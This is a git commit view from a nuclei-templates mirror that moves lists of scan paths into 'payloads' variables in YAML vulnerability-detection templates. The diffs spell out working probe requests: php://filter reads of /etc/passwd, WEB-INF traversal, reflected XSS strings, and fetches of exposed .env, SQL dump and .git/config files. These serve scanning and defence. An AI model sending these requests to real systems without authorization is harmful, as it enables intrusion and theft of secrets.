daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

feat: convert paths with lots of elements to payloads

patch-1
Ice3man 2024-04-12 16:01:51 +05:30
parent 1dd3635124
commit a63774c77e
35 changed files with 939 additions and 834 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
http/cves/2013/CVE-2013-3827.yaml
View File

@ -30,16 +30,19 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." payloads:
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" paths:
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" - "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" - "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
stop-at-first-match: true stop-at-first-match: true

25
http/cves/2014/CVE-2014-2383.yaml
View File

@ -34,17 +34,20 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd" payloads:
- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" paths:
- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
stop-at-first-match: true stop-at-first-match: true

19
http/cves/2014/CVE-2014-6271.yaml
View File

@ -32,14 +32,17 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/cgi-bin/status" payloads:
- "{{BaseURL}}/cgi-bin/stats" paths:
- "{{BaseURL}}/cgi-bin/test" - ""
- "{{BaseURL}}/cgi-bin/status/status.cgi" - "/cgi-bin/status"
- "{{BaseURL}}/test.cgi" - "/cgi-bin/stats"
- "{{BaseURL}}/debug.cgi" - "/cgi-bin/test"
- "{{BaseURL}}/cgi-bin/test-cgi" - "/cgi-bin/status/status.cgi"
- "/test.cgi"
- "/debug.cgi"
- "/cgi-bin/test-cgi"
stop-at-first-match: true stop-at-first-match: true

21
http/cves/2022/CVE-2022-48197.yaml
View File

@ -32,15 +32,18 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" payloads:
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" paths:
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
stop-at-first-match: true stop-at-first-match: true

25
http/cves/2023/CVE-2023-6379.yaml
View File

@ -33,17 +33,20 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' payloads:
- '{{BaseURL}}/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' paths:
- '{{BaseURL}}/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1' - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
- '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and

43
http/exposed-panels/openam-panel.yaml
View File

@ -19,26 +19,29 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/openam/XUI" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/XUI" payloads:
- "{{BaseURL}}/XUI/#login" paths:
- "{{BaseURL}}/UI" - "/openam/XUI"
- "{{BaseURL}}/sso/XUI" - "/XUI"
- "{{BaseURL}}/sso/UI" - "/XUI/#login"
- "{{BaseURL}}/sso/UI/#login" - "/UI"
- "{{BaseURL}}/opensso/UI/Login" - "/sso/XUI"
- "{{BaseURL}}/openam/UI/login" - "/sso/UI"
- "{{BaseURL}}/openam/UI/#loginlogin" - "/sso/UI/#login"
- "{{BaseURL}}/openam/UI/Login" - "/opensso/UI/Login"
- "{{BaseURL}}/openam/XUI/Login" - "/openam/UI/login"
- "{{BaseURL}}/openam/XUI/login" - "/openam/UI/#loginlogin"
- "{{BaseURL}}/openam/XUI/#login" - "/openam/UI/Login"
- "{{BaseURL}}/am/UI/Login" - "/openam/XUI/Login"
- "{{BaseURL}}/am/UI/#login" - "/openam/XUI/login"
- "{{BaseURL}}/am/XUI/" - "/openam/XUI/#login"
- "{{BaseURL}}/am/XUI/Login" - "/am/UI/Login"
- "{{BaseURL}}/am/json/serverinfo/*" - "/am/UI/#login"
- "{{BaseURL}}/openam/json/serverinfo/*" - "/am/XUI/"
- "/am/XUI/Login"
- "/am/json/serverinfo/*"
- "/openam/json/serverinfo/*"
host-redirects: true host-redirects: true
stop-at-first-match: true stop-at-first-match: true

29
http/exposed-panels/phpmyadmin-panel.yaml
View File

@ -19,19 +19,22 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/phpmyadmin/" payloads:
- "{{BaseURL}}/admin/phpmyadmin/" paths:
- "{{BaseURL}}/_phpmyadmin/" - ""
- "{{BaseURL}}/administrator/components/com_joommyadmin/phpmyadmin/" - "/phpmyadmin/"
- "{{BaseURL}}/apache-default/phpmyadmin/" - "/admin/phpmyadmin/"
- "{{BaseURL}}/blog/phpmyadmin/" - "/_phpmyadmin/"
- "{{BaseURL}}/forum/phpmyadmin/" - "/administrator/components/com_joommyadmin/phpmyadmin/"
- "{{BaseURL}}/php/phpmyadmin/" - "/apache-default/phpmyadmin/"
- "{{BaseURL}}/typo3/phpmyadmin/" - "/blog/phpmyadmin/"
- "{{BaseURL}}/web/phpmyadmin/" - "/forum/phpmyadmin/"
- "{{BaseURL}}/xampp/phpmyadmin/" - "/php/phpmyadmin/"
- "{{BaseURL}}/phpMyAdmin/" - "/typo3/phpmyadmin/"
- "/web/phpmyadmin/"
- "/xampp/phpmyadmin/"
- "/phpMyAdmin/"
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:

37
http/exposed-panels/webeditors-check-detect.yaml
View File

@ -18,23 +18,26 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/fckeditor/_samples/default.html" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/fckeditor/editor/filemanager/connectors/uploadtest.html" payloads:
- "{{BaseURL}}/ckeditor/samples/" paths:
- "{{BaseURL}}/editor/ckeditor/samples/" - "/fckeditor/_samples/default.html"
- "{{BaseURL}}/ckeditor/samples/sample_posteddata.php" - "/fckeditor/editor/filemanager/connectors/uploadtest.html"
- "{{BaseURL}}/editor/ckeditor/samples/sample_posteddata.php" - "/ckeditor/samples/"
- "{{BaseURL}}/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" - "/editor/ckeditor/samples/"
- "{{BaseURL}}/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php" - "/ckeditor/samples/sample_posteddata.php"
- "{{BaseURL}}/plugin/editor/smarteditor2/SmartEditor2Skin.html" - "/editor/ckeditor/samples/sample_posteddata.php"
- "{{BaseURL}}/js/se2/SmartEditor2.html" - "/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
- "{{BaseURL}}/nse/SmartEditor2.html" - "/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php"
- "{{BaseURL}}/SmartEditor2.html" - "/plugin/editor/smarteditor2/SmartEditor2Skin.html"
- "{{BaseURL}}/apps/ckeditor/samples/old/replacebyclass.html" - "/js/se2/SmartEditor2.html"
- "{{BaseURL}}/plugin/editor/ckeditor/samples/old/replacebyclass.html" - "/nse/SmartEditor2.html"
- "{{BaseURL}}/latest/samples/old/replacebyclass.html" - "/SmartEditor2.html"
- "{{BaseURL}}/Content/ckeditor/samples/old/replacebyclass.html" - "/apps/ckeditor/samples/old/replacebyclass.html"
- "{{BaseURL}}/ckeditor/samples/plugins/htmlwriter/outputhtml.html" - "/plugin/editor/ckeditor/samples/old/replacebyclass.html"
- "/latest/samples/old/replacebyclass.html"
- "/Content/ckeditor/samples/old/replacebyclass.html"
- "/ckeditor/samples/plugins/htmlwriter/outputhtml.html"
matchers: matchers:
- type: word - type: word

121
http/exposures/apis/swagger-api.yaml
View File

@ -18,65 +18,68 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/swagger-ui/swagger-ui.js" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/swagger/swagger-ui.js" payloads:
- "{{BaseURL}}/swagger-ui.js" paths:
- "{{BaseURL}}/swagger/ui/swagger-ui.js" - "/swagger-ui/swagger-ui.js"
- "{{BaseURL}}/swagger/ui/index" - "/swagger/swagger-ui.js"
- "{{BaseURL}}/swagger/index.html" - "/swagger-ui.js"
- "{{BaseURL}}/swagger-ui.html" - "/swagger/ui/swagger-ui.js"
- "{{BaseURL}}/swagger/swagger-ui.html" - "/swagger/ui/index"
- "{{BaseURL}}/api/swagger-ui.html" - "/swagger/index.html"
- "{{BaseURL}}/api-docs/swagger.json" - "/swagger-ui.html"
- "{{BaseURL}}/api-docs/swagger.yaml" - "/swagger/swagger-ui.html"
- "{{BaseURL}}/api_docs" - "/api/swagger-ui.html"
- "{{BaseURL}}/swagger.json" - "/api-docs/swagger.json"
- "{{BaseURL}}/swagger.yaml" - "/api-docs/swagger.yaml"
- "{{BaseURL}}/swagger/v1/swagger.json" - "/api_docs"
- "{{BaseURL}}/swagger/v1/swagger.yaml" - "/swagger.json"
- "{{BaseURL}}/api/index.html" - "/swagger.yaml"
- "{{BaseURL}}/api/doc" - "/swagger/v1/swagger.json"
- "{{BaseURL}}/api/docs/" - "/swagger/v1/swagger.yaml"
- "{{BaseURL}}/api/swagger.json" - "/api/index.html"
- "{{BaseURL}}/api/swagger.yaml" - "/api/doc"
- "{{BaseURL}}/api/swagger.yml" - "/api/docs/"
- "{{BaseURL}}/api/swagger/index.html" - "/api/swagger.json"
- "{{BaseURL}}/api/swagger/swagger-ui.html" - "/api/swagger.yaml"
- "{{BaseURL}}/api/api-docs/swagger.json" - "/api/swagger.yml"
- "{{BaseURL}}/api/api-docs/swagger.yaml" - "/api/swagger/index.html"
- "{{BaseURL}}/api/swagger-ui/swagger.json" - "/api/swagger/swagger-ui.html"
- "{{BaseURL}}/api/swagger-ui/swagger.yaml" - "/api/api-docs/swagger.json"
- "{{BaseURL}}/api/apidocs/swagger.json" - "/api/api-docs/swagger.yaml"
- "{{BaseURL}}/api/apidocs/swagger.yaml" - "/api/swagger-ui/swagger.json"
- "{{BaseURL}}/api/swagger-ui/api-docs" - "/api/swagger-ui/swagger.yaml"
- "{{BaseURL}}/api/doc.json" - "/api/apidocs/swagger.json"
- "{{BaseURL}}/api/api-docs" - "/api/apidocs/swagger.yaml"
- "{{BaseURL}}/api/apidocs" - "/api/swagger-ui/api-docs"
- "{{BaseURL}}/api/swagger" - "/api/doc.json"
- "{{BaseURL}}/api/swagger/static/index.html" - "/api/api-docs"
- "{{BaseURL}}/api/swagger-resources" - "/api/apidocs"
- "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" - "/api/swagger"
- "{{BaseURL}}/api/__swagger__/" - "/api/swagger/static/index.html"
- "{{BaseURL}}/api/_swagger_/" - "/api/swagger-resources"
- "{{BaseURL}}/api/spec/swagger.json" - "/api/swagger-resources/restservices/v2/api-docs"
- "{{BaseURL}}/api/spec/swagger.yaml" - "/api/__swagger__/"
- "{{BaseURL}}/api/swagger/ui/index" - "/api/_swagger_/"
- "{{BaseURL}}/__swagger__/" - "/api/spec/swagger.json"
- "{{BaseURL}}/_swagger_/" - "/api/spec/swagger.yaml"
- "{{BaseURL}}/api/v1/swagger-ui/swagger.json" - "/api/swagger/ui/index"
- "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - "/__swagger__/"
- "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" - "/_swagger_/"
- "{{BaseURL}}/api/swagger_doc.json" - "/api/v1/swagger-ui/swagger.json"
- "{{BaseURL}}/docu" - "/api/v1/swagger-ui/swagger.yaml"
- "{{BaseURL}}/docs" - "/swagger-resources/restservices/v2/api-docs"
- "{{BaseURL}}/swagger" - "/api/swagger_doc.json"
- "{{BaseURL}}/api-doc" - "/docu"
- "{{BaseURL}}/doc/" - "/docs"
- "{{BaseURL}}/swagger-ui/springfox.js" - "/swagger"
- "{{BaseURL}}/swagger-ui/swagger-ui-standalone-preset.js" - "/api-doc"
- "{{BaseURL}}/swagger-ui/swagger-ui/swagger-ui-bundle.js" - "/doc/"
- "{{BaseURL}}/webjars/swagger-ui/swagger-ui-bundle.js" - "/swagger-ui/springfox.js"
- "{{BaseURL}}/webjars/swagger-ui/index.html" - "/swagger-ui/swagger-ui-standalone-preset.js"
- "/swagger-ui/swagger-ui/swagger-ui-bundle.js"
- "/webjars/swagger-ui/swagger-ui-bundle.js"
- "/webjars/swagger-ui/index.html"
headers: headers:
Accept: text/html Accept: text/html

45
http/exposures/backups/sql-dump.yaml
View File

@ -16,27 +16,30 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/1.sql" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/backup.sql" payloads:
- "{{BaseURL}}/database.sql" paths:
- "{{BaseURL}}/data.sql" - "/1.sql"
- "{{BaseURL}}/db_backup.sql" - "/backup.sql"
- "{{BaseURL}}/dbdump.sql" - "/database.sql"
- "{{BaseURL}}/db.sql" - "/data.sql"
- "{{BaseURL}}/dump.sql" - "/db_backup.sql"
- "{{BaseURL}}/{{Hostname}}.sql" - "/dbdump.sql"
- "{{BaseURL}}/{{Hostname}}_db.sql" - "/db.sql"
- "{{BaseURL}}/localhost.sql" - "/dump.sql"
- "{{BaseURL}}/mysqldump.sql" - "/{{Hostname}}.sql"
- "{{BaseURL}}/mysql.sql" - "/{{Hostname}}_db.sql"
- "{{BaseURL}}/site.sql" - "/localhost.sql"
- "{{BaseURL}}/sql.sql" - "/mysqldump.sql"
- "{{BaseURL}}/temp.sql" - "/mysql.sql"
- "{{BaseURL}}/translate.sql" - "/site.sql"
- "{{BaseURL}}/users.sql" - "/sql.sql"
- "{{BaseURL}}/www.sql" - "/temp.sql"
- "{{BaseURL}}/wp-content/uploads/dump.sql" - "/translate.sql"
- "{{BaseURL}}/wp-content/mysql.sql" - "/users.sql"
- "/www.sql"
- "/wp-content/uploads/dump.sql"
- "/wp-content/mysql.sql"
headers: headers:
Range: "bytes=0-3000" Range: "bytes=0-3000"

27
http/exposures/configs/codeigniter-env.yaml
View File

@ -12,18 +12,21 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.env" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.env.dev.local" payloads:
- "{{BaseURL}}/.env.development.local" paths:
- "{{BaseURL}}/.env.prod.local" - "/.env"
- "{{BaseURL}}/.env.production.local" - "/.env.dev.local"
- "{{BaseURL}}/.env.local" - "/.env.development.local"
- "{{BaseURL}}/.env.example" - "/.env.prod.local"
- "{{BaseURL}}/.env.stage" - "/.env.production.local"
- "{{BaseURL}}/.env.live" - "/.env.local"
- "{{BaseURL}}/.env_1" - "/.env.example"
- "{{BaseURL}}/.env.old" - "/.env.stage"
- "{{BaseURL}}/.env_sample" - "/.env.live"
- "/.env_1"
- "/.env.old"
- "/.env_sample"
matchers-condition: and matchers-condition: and
matchers: matchers:

27
http/exposures/configs/deployment-ini.yaml
View File

@ -18,18 +18,21 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/deployment.ini" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/deploy.ini" payloads:
- "{{BaseURL}}/production.ini" paths:
- "{{BaseURL}}/prod.ini" - "/deployment.ini"
- "{{BaseURL}}/deployment.production.ini" - "/deploy.ini"
- "{{BaseURL}}/deployment.prod.ini" - "/production.ini"
- "{{BaseURL}}/deploy.production.ini" - "/prod.ini"
- "{{BaseURL}}/deploy.prod.ini" - "/deployment.production.ini"
- "{{BaseURL}}/server.ini" - "/deployment.prod.ini"
- "{{BaseURL}}/ftp.ini" - "/deploy.production.ini"
- "{{BaseURL}}/ftps.ini" - "/deploy.prod.ini"
- "{{BaseURL}}/sftp.ini" - "/server.ini"
- "/ftp.ini"
- "/ftps.ini"
- "/sftp.ini"
stop-at-first-match: true stop-at-first-match: true

23
http/exposures/configs/git-config-nginxoffbyslash.yaml
View File

@ -20,16 +20,19 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/static../.git/config' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/js../.git/config' payloads:
- '{{BaseURL}}/images../.git/config' paths:
- '{{BaseURL}}/img../.git/config' - '/static../.git/config'
- '{{BaseURL}}/css../.git/config' - '/js../.git/config'
- '{{BaseURL}}/assets../.git/config' - '/images../.git/config'
- '{{BaseURL}}/content../.git/config' - '/img../.git/config'
- '{{BaseURL}}/events../.git/config' - '/css../.git/config'
- '{{BaseURL}}/media../.git/config' - '/assets../.git/config'
- '{{BaseURL}}/lib../.git/config' - '/content../.git/config'
- '/events../.git/config'
- '/media../.git/config'
- '/lib../.git/config'
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:

57
http/exposures/configs/github-workflows-disclosure.yaml
View File

@ -14,33 +14,36 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.github/workflows/ci.yml" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.github/workflows/ci.yaml" payloads:
- "{{BaseURL}}/.github/workflows/CI.yml" paths:
- "{{BaseURL}}/.github/workflows/main.yml" - "/.github/workflows/ci.yml"
- "{{BaseURL}}/.github/workflows/main.yaml" - "/.github/workflows/ci.yaml"
- "{{BaseURL}}/.github/workflows/build.yml" - "/.github/workflows/CI.yml"
- "{{BaseURL}}/.github/workflows/build.yaml" - "/.github/workflows/main.yml"
- "{{BaseURL}}/.github/workflows/test.yml" - "/.github/workflows/main.yaml"
- "{{BaseURL}}/.github/workflows/test.yaml" - "/.github/workflows/build.yml"
- "{{BaseURL}}/.github/workflows/tests.yml" - "/.github/workflows/build.yaml"
- "{{BaseURL}}/.github/workflows/tests.yaml" - "/.github/workflows/test.yml"
- "{{BaseURL}}/.github/workflows/release.yml" - "/.github/workflows/test.yaml"
- "{{BaseURL}}/.github/workflows/publish.yml" - "/.github/workflows/tests.yml"
- "{{BaseURL}}/.github/workflows/deploy.yml" - "/.github/workflows/tests.yaml"
- "{{BaseURL}}/.github/workflows/push.yml" - "/.github/workflows/release.yml"
- "{{BaseURL}}/.github/workflows/lint.yml" - "/.github/workflows/publish.yml"
- "{{BaseURL}}/.github/workflows/coverage.yml" - "/.github/workflows/deploy.yml"
- "{{BaseURL}}/.github/workflows/release.yaml" - "/.github/workflows/push.yml"
- "{{BaseURL}}/.github/workflows/pr.yml" - "/.github/workflows/lint.yml"
- "{{BaseURL}}/.github/workflows/automerge.yml" - "/.github/workflows/coverage.yml"
- "{{BaseURL}}/.github/workflows/docker.yml" - "/.github/workflows/release.yaml"
- "{{BaseURL}}/.github/workflows/ci-generated.yml" - "/.github/workflows/pr.yml"
- "{{BaseURL}}/.github/workflows/ci-push.yml" - "/.github/workflows/automerge.yml"
- "{{BaseURL}}/.github/workflows/ci-daily.yml" - "/.github/workflows/docker.yml"
- "{{BaseURL}}/.github/workflows/ci-issues.yml" - "/.github/workflows/ci-generated.yml"
- "{{BaseURL}}/.github/workflows/smoosh-status.yml" - "/.github/workflows/ci-push.yml"
- "{{BaseURL}}/.github/workflows/snyk.yml" - "/.github/workflows/ci-daily.yml"
- "/.github/workflows/ci-issues.yml"
- "/.github/workflows/smoosh-status.yml"
- "/.github/workflows/snyk.yml"
matchers-condition: and matchers-condition: and
matchers: matchers:

47
http/exposures/configs/laravel-env.yaml
View File

@ -20,28 +20,31 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.env" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.env.bak" payloads:
- "{{BaseURL}}/.env.dev" paths:
- "{{BaseURL}}/.env.dev.local" - "/.env"
- "{{BaseURL}}/.env.development.local" - "/.env.bak"
- "{{BaseURL}}/.env.prod" - "/.env.dev"
- "{{BaseURL}}/.env.prod.local" - "/.env.dev.local"
- "{{BaseURL}}/.env.production" - "/.env.development.local"
- "{{BaseURL}}/.env.production.local" - "/.env.prod"
